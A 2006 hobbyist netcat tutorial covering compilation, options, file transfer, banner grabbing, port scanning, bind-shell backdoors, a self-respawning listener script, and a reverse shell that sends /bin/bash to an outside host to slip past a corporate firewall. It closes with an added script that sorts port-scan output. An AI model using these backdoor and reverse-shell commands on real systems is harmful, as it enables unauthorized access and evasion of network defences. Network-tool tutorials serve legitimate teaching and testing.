Hacking With Your Cat - Ver 1.2
Last Update 12-10-2006
By: magikh0e <h0e at IHTB d0t org>
Http://www.IHTB.org

ToC:

0x1 - What is Netcat
   -> Compiling Netcat
      -> -DGAPING_SECURITY_HOLE
      -> -DTELNET
      -> Build Netcat
      -> Supported OS
   -> Author
   -> Features
   -> Download
0x2 - Netcat Explained (Nix/Windows)
   -> Options & Switches
   -> Basic usage Examples
      -> File Transfer
      -> Telnet Client/Server
0x3 - Hacking with the cat
   -> Banner Grabbing
      -> HTTP
      -> DNS
   -> Fun with Ports
      -> Port Redirection
      -> Port Scanning
   -> Backdoors
      -> Basic Backdoor
      -> Inetd Backdoor
   -> Bypassing The Firewall
      -> Reverse Telnet Sessions

0x1 -What is Netcat-->

Netcat is a tool similar to the Unix command cat. The cat command concatenates files and prints them; netcat does basically the same thing, except that instead of concatenating files it connects TCP and UDP sockets to stdin and stdout. From a distance netcat can be viewed as a simple telnet program, but then again, would you call a Swiss army knife a simple knife?

-=* Compiling Netcat *=-

[ Enable -DGAPING_SECURITY_HOLE ]

This define enables the -e switch (exec a program on connection). It makes netcat very powerful, but it is also a huge risk in the wrong hands... damn hackers.

[ Enable -DTELNET ]

Without this define netcat is unable to talk to a telnet server: telnet servers and their clients negotiate options before the login prompt is displayed. Enabling -DTELNET (and passing -t at run time) lets netcat answer those negotiations.

Edit the Makefile so the DFLAGS line reads:

# DFLAGS = -DTEST -DDEBUG
DFLAGS = -DGAPING_SECURITY_HOLE -DTELNET
CFLAGS = -O

Linux users, modify netcat.c and add #include "resolv.h" on line 30:

#include "resolv.h"
#include "generic.h" /* same as with L5, skey, etc */

You are now ready to rock. Compile netcat by typing make SYSTEM, replacing SYSTEM with your OS (for example, make linux).
If your OS is not supported, you can try 'make generic'.

Supported OS: Linux, Irix, OSF, MSDOS, BugLix, SunOS, AIX, Solaris, FreeBSD, BSDi, NetBSD, HPUX, UnixWare, NeXTSTEP, Generic

-=* Netcat's Author(s) *=-

Hobbit (hobbit@avian.org) created netcat in 1995 as a feature-rich network debugging and exploration tool. Its purpose was to be able to create just about any type of network connection. According to Hobbit, the original version of netcat was released to run on Unix and Linux. Weld Pond (weld@l0pht.com) released the Windows NT port in 1998.

-=* Netcat Features *=-

* OUTbound or INbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally-configured network source address
* Built-in port-scanning capabilities, with randomization functionality
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every X seconds
* Optional ability to let another program service the INbound connections

-=* Download Netcat *=-

* Microsoft       http://www.vulnwatch.org/netcat/nc111nt.zip
* Linux/Unix/BSD  http://www.vulnwatch.org/netcat/nc110.tgz
* GNU             http://netcat.sourceforge.net/

0x2 -Netcat Options Explained (Nix/Win)-->

Connecting to a server:
    nc [-options] hostname port[s] [ports] ...

Listen for INbound connection requests:
    nc -l -p port_number [-options] [hostname] [port]

Options:

  -d              (Windows) detach from console, background mode
  -e program      Program to exec upon connection
                  [* -e only works when netcat is compiled with -DGAPING_SECURITY_HOLE *]
  -b              Allow broadcasts
  -g gateway      Source routing hop point[s], up to 8
  -G number       Source routing pointer: 4, 8, 12, ...
  -h              Help & usage
  -i seconds      Delay interval for lines sent, ports scanned, and (in listen mode) inbound connects
  -l              Listen mode, inbound
  -L              (Windows) keep listening after the socket closes
  -n              Numeric IP addresses only, do not resolve DNS
  -o filename     Hex dump of traffic to the specified file
  -p port         Local port number
  -r              Randomize local & remote ports
  -q seconds      (Linux) after EOF on stdin, wait this many seconds, then quit
  -s address      Local source address
  -t              Answer telnet negotiations
  -u              Operate in UDP mode
  -v              Verbose (-vv is twice as verbose)
  -w seconds      Timeout value for connects and final net reads
  -z              Zero I/O mode, normally used for scanning

-=* Netcat Basic Usage Examples *=-

Note: listening on, or sending from, a port below 1024 (-l -p / -p) requires root access.

- Linux/Unix -

[ Simple Listening TCP server ]
nc -l -p port_number

[ Simple Listening UDP server ]
nc -l -p port_number -u

[ Redirect STDIN/STDOUT of a program to the connection ]
nc -l -p port_number -e /path/to/some_program

[ Set timeout value before netcat gives up ]
nc -w timeout_value hostname port

[ Pipe output from some_program to netcat ]
some_program | nc hostname port

[ Pipe output from netcat to other_program ]
nc hostname port | other_program

[ File Transferring ]

The file some.file is transferred from the client onto the server. Make sure the wait time on the server side is the longer of the two: the server is the side most affected by pauses during the transfer, and it closes once -w seconds pass with nothing more to read.

Server: nc -v -w 30 -l -p 10000 > some.file.backup
Client: nc -v -w 2 server_ip_address 10000 < some.file

Netcat does no integrity checking of its own, so compare checksums on both ends afterwards (md5sum some.file on the client, md5sum some.file.backup on the server).

[ Telnet Client ]
nc -vvn serverIP 23

Add -t if you want netcat to answer the server's option negotiation instead of printing it as garbage before the login prompt.

[ Telnet Server ]
nc -l -p 10000 -e /bin/bash -t    <-- -t answers telnet negotiations

0x3 -hax0ring with the cat-->

-=* Banner Grabbing *=-

Netcat is an excellent tool for banner checking: unlike telnet it sends stdin through untouched and waits (up to -w seconds) for the server's response.

[ HTTP ]

root@PenguinSecurity:~# printf 'HEAD / HTTP/1.0\n\n' | nc -w 10 www.ihtb.org 80
HTTP/1.1 200 OK
Date: Sat, 09 Dec 2006 20:30:41 GMT
Server: Apache
X-Powered-By: PHP
Connection: close
Content-Type: text/html

(HTTP formally wants \r\n line endings; most servers, as here, accept bare \n.)

[ DNS ]

Below is an example of using bash and netcat to fingerprint a remote DNS server. It asks for the TXT record version.bind in the CHAOS class, which BIND answers with its version string unless the admin has hidden it.
checkdns() { printf 'begin-base64 644 -\np8IBAAABAAAAAAAAB3ZlcnNpb24EYmluZAAAEAADCg==\n====' | uudecode | nc -uw 1 $1 domain | strings | tail -1; }

Example: checkdns ihtb.org, checkdns 210.210.210.1

The base64 blob is a raw DNS packet: transaction ID 0xa7c2, flags 0x0100, one question for the name version.bind, type TXT (0x0010), class CH (0x0003). uudecode turns it back into bytes, nc ships it over UDP to port 53 (domain), and strings/tail pull the version text out of the answer.

-=* Fun with Ports *=-

[ Port Redirection ]

Scenario: (Server A - 172.16.1.1) (Server B - 172.16.1.2) (Server C - 172.16.1.3)

(Server C): nc -l -p 22 -e cmd.exe
(Server A): nc -l -p 10000 -e "nc -nvv 172.16.1.3 22"
(Server B): nc -nvv 172.16.1.1 10000

Server B connects to Server A on port 10000. Server A hands that connection to a second netcat, which connects on to Server C on port 22, where the listener execs cmd.exe; B ends up talking to C's shell through A. Start the listeners (C first, then A) before B connects.

Note: the quoted command line for -e works with the Windows build. The Unix netcat 1.10 source execs the -e target with no arguments, so on a Unix Server A put the `nc -nvv 172.16.1.3 22` line in a small script and give that script's path to -e.

[ Port Scanning ]

Parameters:
  -v  verbose, show closed ports too (-vv for more)
  -w  timeout per connection, in seconds
  -u  UDP mode instead of TCP; use together with -w
  -r  try the ports in random order
  -i  delay in seconds after each port
  -z  zero I/O, connect and disconnect without sending data

Netcat is not meant to be an nmap, but it will get the job done for you quick & dirty (;

Accepted port formats: 1-1024, 2400, 3000-3200, and combinations of them.

nc -vv -z -w 1 172.16.1.1 1-1024

The above command scans TCP ports 1-1024 on 172.16.1.1, giving up on each port after 1 second. -w is a timeout, not a pause between ports; to pace the scan use -i. Without -v netcat reports nothing, so always use -vv when scanning: open ports print as "... open", closed ones as "... Connection refused". Netcat uses TCP unless told otherwise; UDP scanning is done with -u, but since UDP has no handshake netcat can only notice ports that answer with an ICMP unreachable, so a silent UDP port is unknown rather than open.

-=* Backdoors *=-

[ Basic Listening Backdoor ]

Linux: nc -l -p 10000 -e /bin/bash

Linux netcat does not offer the -L switch that Windows netcat has. That switch keeps the listener open after the user disconnects; the Linux one exits after the first session. Have no fear, we have a fix!
Use the script below as a netcat wrapper to mimic the -L switch. Start it with the port as its only argument, e.g. ./listener.sh 10000 (file name assumed). It spawns a listener that execs the script itself (-e $0) on each connection. Because -e passes no arguments, the re-exec'd copy sees an empty $1 and takes the port from the environment; it first forks a fresh listener for the next connection and then hands the socket, which is its stdin/stdout, to the shell.

[code]
#!/bin/bash
# first run: take the port from $1; re-execs inherit it from the environment
export port=${port:-$1}
export PROGRAM=${PROGRAM:-/bin/bash}
nc -l -p $port -e $0 &      # await further connections
[ "$1" ] || exec $PROGRAM   # no args: we were exec'd by nc, give the socket to the shell
[/code]

Windows Backdoor: nc -L -p 10000 -e cmd.exe

[ Inetd Backdoor ]

When netcat is compiled with GAPING_SECURITY_HOLE defined it can be run as a network server under inetd. It can also act as an 'inverse inetd': inetd hands the accepted connection to netcat on stdin/stdout, and netcat connects out somewhere else, which makes it a port redirector, the same idea as the reverse telnet session below.

inetd.conf example (fields: service, socket type, protocol, wait/nowait, user, program path, then the program's arguments starting with its argv[0]):

www stream tcp nowait root /path/to/nc nc -w 5 client_ip 80

Whoever connects to this host's www port is relayed to client_ip port 80. Nothing in that line needs root, so run it as nobody unless the program behind it really requires it, and remember that inetd must be sent a HUP to re-read inetd.conf.

-=* Bypassing the Firewall *=-

Over the firewall and through the router, off to grandma's house we go....

[ Reverse Telnet Session ]

Scenario: You have access to a host on a corporate network; unfortunately the host is behind the corporate firewall. No inbound connections to the host from the Internet are allowed, and the host resides on an RFC 1918 network. Imagine the firewall is also VERY restrictive, allowing OUTbound connections only to HTTP servers.

Have no fear, we can use netcat to create a tunnel out of the network. It is just like the previous 'backdoor', only in reverse: the inside host makes the connection, so the firewall's inbound rules never see it.

In the event an internal host is being forced to use a proxy server for HTTP, try ports 21 and/or 23. These ports are rarely behind proxies, since proxying them would break the services that typically run there.

Client (your Internet host, listening): nc -vv -l -p 80
Server (the internal host):             nc client_ip_address 80 -e /bin/bash

The server line tells netcat to initiate a session to our client's IP address. Once the server is connected to the client it execs a /bin/bash shell whose stdin/stdout are the socket. Voilà... 0wnage anyone?!? Keep in mind the shell is not on a tty (no prompt, no job control) and the whole session, including everything typed, crosses the network in cleartext.

That's it for now, email me if you have any questions/comments pertaining to this document.
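Going back to the port-scanning section: a -vv -z scan of a thousand ports prints a line per port, and what you actually want is the short list of open ones. As an added example (not part of the original page), the shell below wraps the scan and sorts netcat's verbose lines into open, closed and filtered. The sample lines are constructed, modelled on netcat 1.10's messages; the "Connection timed out" wording is an assumption, and awk/sort are assumed available:

```shell
#!/bin/bash
# Added example (not from the original page): make sense of a
# "nc -vv -z -w 1 host ports" scan. netcat prints one line per port on stderr;
# the sample below is constructed, modelled on netcat 1.10's messages:
#   host [ip] port (service) open
#   host [ip] port (service) : Connection refused
#   host [ip] port (service) : Connection timed out     (assumed wording)

# Network-facing wrapper: scan and print only the open TCP ports.
# (needs nc and a reachable host; not exercised by the offline check)
scan_open_tcp() {
    host=$1 ports=$2            # e.g. scan_open_tcp 172.16.1.1 1-1024
    nc -vv -z -w 1 "$host" "$ports" 2>&1 | open_ports
}

# stdin: nc's verbose output. stdout: numeric ports reported open, sorted.
open_ports() {
    awk '$NF == "open" { print $3 }' | sort -n
}

# stdin: nc's verbose output. stdout: "port state" per line, nmap-style:
# "open" is open, "refused" means the host answered with a RST so the port
# is closed, anything else (timeouts, unreachables) is filtered.
classify_ports() {
    awk '{
        if ($NF == "open")         state = "open"
        else if ($0 ~ /refused/)   state = "closed"
        else                       state = "filtered"
        print $3, state
    }' | sort -n
}

# Constructed sample of a scan of 172.16.1.1 (not real output).
sample_scan_output() {
    cat <<'EOF'
172.16.1.1 [172.16.1.1] 80 (http) open
172.16.1.1 [172.16.1.1] 23 (telnet) : Connection refused
172.16.1.1 [172.16.1.1] 22 (ssh) open
172.16.1.1 [172.16.1.1] 25 (smtp) : Connection timed out
172.16.1.1 [172.16.1.1] 21 (ftp) : Connection refused
EOF
}
```

scan_open_tcp 172.16.1.1 1-1024 prints just the open ports; feed the raw scan output to classify_ports instead when you also care which ports were refused and which silently timed out, since a firewall dropping packets shows up as the latter.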